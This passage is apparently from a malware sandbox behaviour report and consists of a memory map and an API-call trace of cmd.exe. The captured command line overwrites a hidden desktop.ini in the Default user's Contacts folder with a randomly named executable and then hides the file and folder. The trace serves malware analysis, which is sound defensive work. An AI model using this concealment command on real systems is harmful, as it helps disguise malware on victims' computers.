"\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 30855 start_va = 0xe0000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 30856 start_va = 0x430000 end_va = 0x52ffff entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 30857 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 30858 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 30859 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 30860 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 30861 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 30862 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 30863 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 30864 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 30865 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 30866 start_va = 0xf0000 end_va = 0x1b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000f0000" filename = "" Region: id = 30867 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 30868 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 30869 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 30870 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 30871 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 30872 start_va = 0x2d0000 end_va = 0x3d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 30873 start_va = 0x3e0000 end_va = 0x3e0fff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 30874 start_va = 0x530000 end_va = 0x112ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 30875 start_va = 0x1130000 end_va = 0x1292fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001130000" filename = "" Region: id = 30876 start_va = 0x12a0000 end_va = 0x156efff entry_point = 0x12a0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 709 os_tid = 0x84c [0209.136] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2cfdec | out: lpSystemTimeAsFileTime=0x2cfdec*(dwLowDateTime=0xb176e1e0, dwHighDateTime=0x1d440a9)) [0209.136] GetCurrentProcessId () returned 0x140 [0209.136] GetCurrentThreadId () returned 0x84c [0209.136] GetTickCount () returned 0x3ac45 [0209.136] QueryPerformanceCounter (in: lpPerformanceCount=0x2cfde4 | out: lpPerformanceCount=0x2cfde4*=26592567529) returned 1 [0209.137] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0209.137] __set_app_type (_Type=0x1) [0209.137] __p__fmode () returned 0x76b331f4 [0209.137] __p__commode () returned 0x76b331fc [0209.137] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0209.138] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0209.138] GetCurrentThreadId () returned 0x84c [0209.138] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x84c) returned 0x38 [0209.138] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0209.138] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0209.138] SetThreadUILanguage (LangId=0x0) returned 0x409 [0209.138] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0209.138] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2cfd7c | out: phkResult=0x2cfd7c*=0x0) returned 0x2 [0209.138] VirtualQuery (in: lpAddress=0x2cfdb3, lpBuffer=0x2cfd4c, dwLength=0x1c | out: lpBuffer=0x2cfd4c*(BaseAddress=0x2cf000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0209.138] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x2cfd4c, dwLength=0x1c | out: lpBuffer=0x2cfd4c*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0209.138] VirtualQuery (in: lpAddress=0x1d1000, lpBuffer=0x2cfd4c, dwLength=0x1c | out: lpBuffer=0x2cfd4c*(BaseAddress=0x1d1000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0209.138] VirtualQuery (in: lpAddress=0x1d3000, lpBuffer=0x2cfd4c, dwLength=0x1c | out: lpBuffer=0x2cfd4c*(BaseAddress=0x1d3000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0209.138] VirtualQuery (in: lpAddress=0x2d0000, lpBuffer=0x2cfd4c, dwLength=0x1c | out: lpBuffer=0x2cfd4c*(BaseAddress=0x2d0000, AllocationBase=0x2d0000, AllocationProtect=0x2, RegionSize=0x101000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0209.138] GetConsoleOutputCP () returned 0x1b5 [0209.139] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0209.139] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0209.139] _get_osfhandle (_FileHandle=1) returned 0x7 [0209.139] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0209.139] _get_osfhandle (_FileHandle=1) returned 0x7 [0209.139] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0209.139] _get_osfhandle (_FileHandle=1) returned 0x7 [0209.139] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0209.139] _get_osfhandle (_FileHandle=0) returned 0x3 [0209.139] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0209.139] _get_osfhandle (_FileHandle=0) returned 0x3 [0209.140] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0209.140] GetEnvironmentStringsW () returned 0x440418* [0209.140] FreeEnvironmentStringsW (penv=0x440418) returned 1 [0209.140] GetEnvironmentStringsW () returned 0x440418* [0209.140] FreeEnvironmentStringsW (penv=0x440418) returned 1 [0209.140] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2cecec | out: phkResult=0x2cecec*=0x40) returned 0x0 [0209.140] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2cecf4, lpData=0x2cecf8, lpcbData=0x2cecf0*=0x1000 | out: lpType=0x2cecf4*=0x0, lpData=0x2cecf8*=0xc8, lpcbData=0x2cecf0*=0x1000) returned 0x2 [0209.140] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2cecf4, lpData=0x2cecf8, lpcbData=0x2cecf0*=0x1000 | out: lpType=0x2cecf4*=0x4, lpData=0x2cecf8*=0x1, lpcbData=0x2cecf0*=0x4) returned 0x0 [0209.140] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2cecf4, lpData=0x2cecf8, lpcbData=0x2cecf0*=0x1000 | out: lpType=0x2cecf4*=0x0, lpData=0x2cecf8*=0x1, lpcbData=0x2cecf0*=0x1000) returned 0x2 [0209.140] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2cecf4, lpData=0x2cecf8, lpcbData=0x2cecf0*=0x1000 | out: lpType=0x2cecf4*=0x4, lpData=0x2cecf8*=0x0, lpcbData=0x2cecf0*=0x4) returned 0x0 [0209.140] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2cecf4, lpData=0x2cecf8, lpcbData=0x2cecf0*=0x1000 | out: lpType=0x2cecf4*=0x4, lpData=0x2cecf8*=0x40, lpcbData=0x2cecf0*=0x4) returned 0x0 [0209.140] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2cecf4, lpData=0x2cecf8, lpcbData=0x2cecf0*=0x1000 | out: lpType=0x2cecf4*=0x4, lpData=0x2cecf8*=0x40, lpcbData=0x2cecf0*=0x4) returned 0x0 [0209.141] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2cecf4, lpData=0x2cecf8, lpcbData=0x2cecf0*=0x1000 | out: lpType=0x2cecf4*=0x0, lpData=0x2cecf8*=0x40, lpcbData=0x2cecf0*=0x1000) returned 0x2 [0209.141] RegCloseKey (hKey=0x40) returned 0x0 [0209.141] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2cecec | out: phkResult=0x2cecec*=0x40) returned 0x0 [0209.141] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2cecf4, lpData=0x2cecf8, lpcbData=0x2cecf0*=0x1000 | out: lpType=0x2cecf4*=0x0, lpData=0x2cecf8*=0x40, lpcbData=0x2cecf0*=0x1000) returned 0x2 [0209.141] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2cecf4, lpData=0x2cecf8, lpcbData=0x2cecf0*=0x1000 | out: lpType=0x2cecf4*=0x4, lpData=0x2cecf8*=0x1, lpcbData=0x2cecf0*=0x4) returned 0x0 [0209.141] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2cecf4, lpData=0x2cecf8, lpcbData=0x2cecf0*=0x1000 | out: lpType=0x2cecf4*=0x0, lpData=0x2cecf8*=0x1, lpcbData=0x2cecf0*=0x1000) returned 0x2 [0209.141] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2cecf4, lpData=0x2cecf8, lpcbData=0x2cecf0*=0x1000 | out: lpType=0x2cecf4*=0x4, lpData=0x2cecf8*=0x0, lpcbData=0x2cecf0*=0x4) returned 0x0 [0209.141] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2cecf4, lpData=0x2cecf8, lpcbData=0x2cecf0*=0x1000 | out: lpType=0x2cecf4*=0x4, lpData=0x2cecf8*=0x9, lpcbData=0x2cecf0*=0x4) returned 0x0 [0209.141] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2cecf4, lpData=0x2cecf8, lpcbData=0x2cecf0*=0x1000 | out: lpType=0x2cecf4*=0x4, lpData=0x2cecf8*=0x9, lpcbData=0x2cecf0*=0x4) returned 0x0 [0209.141] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2cecf4, lpData=0x2cecf8, lpcbData=0x2cecf0*=0x1000 | out: lpType=0x2cecf4*=0x0, lpData=0x2cecf8*=0x9, lpcbData=0x2cecf0*=0x1000) returned 0x2 [0209.141] RegCloseKey (hKey=0x40) returned 0x0 [0209.141] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863ab [0209.141] srand (_Seed=0x5b8863ab) [0209.141] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\Default\\Contacts\\desktop.ini\" & del /f /q \"C:\\Users\\Default\\Contacts\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\Default\\Contacts\\desktop.ini\" && attrib +h \"C:\\Users\\Default\\Contacts\\desktop.ini\" && attrib +h \"C:\\Users\\Default\\Contacts\"" [0209.141] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\Default\\Contacts\\desktop.ini\" & del /f /q \"C:\\Users\\Default\\Contacts\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\Default\\Contacts\\desktop.ini\" && attrib +h \"C:\\Users\\Default\\Contacts\\desktop.ini\" && attrib +h \"C:\\Users\\Default\\Contacts\"" [0209.141] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0209.142] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x441b78, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0209.142] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0209.142] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0209.142] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0209.142] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0209.142] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0209.142] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0209.142] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0209.142] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0209.142] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0209.142] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0209.142] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0209.142] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0209.142] GetEnvironmentStringsW () returned 0x442568* [0209.143] FreeEnvironmentStringsW (penv=0x442568) returned 1 [0209.143] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0209.143] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0209.143] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0209.143] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0209.143] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0209.143] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0209.143] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0209.143] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0209.143] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0209.143] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0209.143] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2cfab8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0209.143] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2cfab8, lpFilePart=0x2cfab4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2cfab4*="Desktop") returned 0x18 [0209.143] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0209.143] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2cf834 | out: lpFindFileData=0x2cf834) returned 0x440bf8 [0209.143] FindClose (in: hFindFile=0x440bf8 | out: hFindFile=0x440bf8) returned 1 [0209.144] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2cf834 | out: lpFindFileData=0x2cf834) returned 0x440bf8 [0209.144] FindClose (in: hFindFile=0x440bf8 | out: hFindFile=0x440bf8) returned 1 [0209.144] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2cf834 | out: lpFindFileData=0x2cf834) returned 0x440bf8 [0209.144] FindClose (in: hFindFile=0x440bf8 | out: hFindFile=0x440bf8) returned 1 [0209.144] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0209.144] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0209.144] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0209.144] GetEnvironmentStringsW () returned 0x440418* [0209.144] FreeEnvironmentStringsW (penv=0x440418) returned 1 [0209.144] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0209.145] GetConsoleOutputCP () returned 0x1b5 [0209.145] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0209.145] GetUserDefaultLCID () returned 0x409 [0209.145] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0209.146] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2cfbf8, cchData=128 | out: lpLCData="0") returned 2 [0209.146] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2cfbf8, cchData=128 | out: lpLCData="0") returned 2 [0209.146] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2cfbf8, cchData=128 | out: lpLCData="1") returned 2 [0209.146] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0209.146] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0209.146] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0209.146] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0209.146] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0209.146] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0209.146] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0209.146] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0209.146] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0209.146] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0209.146] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0209.147] GetConsoleTitleW (in: lpConsoleTitle=0x430a70, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0209.147] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0209.147] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0209.147] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0209.147] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0209.148] _wcsicmp (_String1="attrib", _String2=")") returned 56 [0209.148] _wcsicmp (_String1="FOR", _String2="attrib") returned 5 [0209.148] _wcsicmp (_String1="FOR/?", _String2="attrib") returned 5 [0209.149] _wcsicmp (_String1="IF", _String2="attrib") returned 8 [0209.149] _wcsicmp (_String1="IF/?", _String2="attrib") returned 8 [0209.149] _wcsicmp (_String1="REM", _String2="attrib") returned 17 [0209.149] _wcsicmp (_String1="REM/?", _String2="attrib") returned 17 [0209.151] _wcsicmp (_String1="del", _String2=")") returned 59 [0209.151] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0209.151] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0209.151] _wcsicmp (_String1="IF", _String2="del") returned 5 [0209.151] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0209.151] _wcsicmp (_String1="REM", _String2="del") returned 14 [0209.151] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0209.153] _wcsicmp (_String1="type", _String2=")") returned 75 [0209.153] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0209.153] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0209.153] _wcsicmp (_String1="IF", _String2="type") returned -11 [0209.153] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0209.153] _wcsicmp (_String1="REM", _String2="type") returned -2 [0209.153] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0209.156] _wcsicmp (_String1="FOR", _String2="attrib") returned 5 [0209.156] _wcsicmp (_String1="FOR/?", _String2="attrib") returned 5 [0209.156] _wcsicmp (_String1="IF", _String2="attrib") returned 8 [0209.156] _wcsicmp (_String1="IF/?", _String2="attrib") returned 8 [0209.156] _wcsicmp (_String1="REM", _String2="attrib") returned 17 [0209.156] _wcsicmp (_String1="REM/?", _String2="attrib") returned 17 [0209.261] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0209.261] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0209.270] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0209.274] FindClose (in: hFindFile=0x4424e8 | out: hFindFile=0x4424e8) returned 1 [0209.274] FindClose (in: hFindFile=0x4424e8 | out: hFindFile=0x4424e8) returned 1 [0209.274] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0209.275] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0209.275] GetConsoleTitleW (in: lpConsoleTitle=0x2cf620, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0209.275] InitializeProcThreadAttributeList (in: lpAttributeList=0x2cf4a8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2cf570 | out: lpAttributeList=0x2cf4a8, lpSize=0x2cf570) returned 1 [0209.275] UpdateProcThreadAttribute (in: lpAttributeList=0x2cf4a8, dwFlags=0x0, Attribute=0x60001, lpValue=0x2cf568, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2cf4a8, lpPreviousValue=0x0) returned 1 [0209.275] GetStartupInfoW (in: lpStartupInfo=0x2cf464 | out: lpStartupInfo=0x2cf464*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0209.275] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0209.276] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib -r -s -h \"C:\\Users\\Default\\Contacts\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2cf504*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib -r -s -h \"C:\\Users\\Default\\Contacts\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2cf550 | out: lpCommandLine="attrib -r -s -h \"C:\\Users\\Default\\Contacts\\desktop.ini\" ", lpProcessInformation=0x2cf550*(hProcess=0x50, hThread=0x4c, dwProcessId=0x3a4, dwThreadId=0xf98)) returned 1 [0209.286] CloseHandle (hObject=0x4c) returned 1 [0209.286] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0209.286] GetEnvironmentStringsW () returned 0x440838* [0209.287] FreeEnvironmentStringsW (penv=0x440838) returned 1 [0209.287] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0209.436] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x2cf444 | out: lpExitCode=0x2cf444*=0x0) returned 1 [0209.436] CloseHandle (hObject=0x50) returned 1 [0209.436] _vsnwprintf (in: _Buffer=0x2cf58c, _BufferCount=0x13, _Format="%08X", _ArgList=0x2cf450 | out: _Buffer="00000000") returned 8 [0209.436] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0209.436] GetEnvironmentStringsW () returned 0x442558* [0209.436] FreeEnvironmentStringsW (penv=0x442558) returned 1 [0209.436] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0209.436] GetEnvironmentStringsW () returned 0x442558* [0209.436] FreeEnvironmentStringsW (penv=0x442558) returned 1 [0209.436] DeleteProcThreadAttributeList (in: lpAttributeList=0x2cf4a8 | out: lpAttributeList=0x2cf4a8) [0209.436] GetConsoleTitleW (in: lpConsoleTitle=0x2cf828, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0209.437] GetFileAttributesW (lpFileName="C:\\Users\\Default\\Contacts\\desktop.ini" (normalized: "c:\\users\\default\\contacts\\desktop.ini")) returned 0x20 [0209.437] GetFileAttributesW 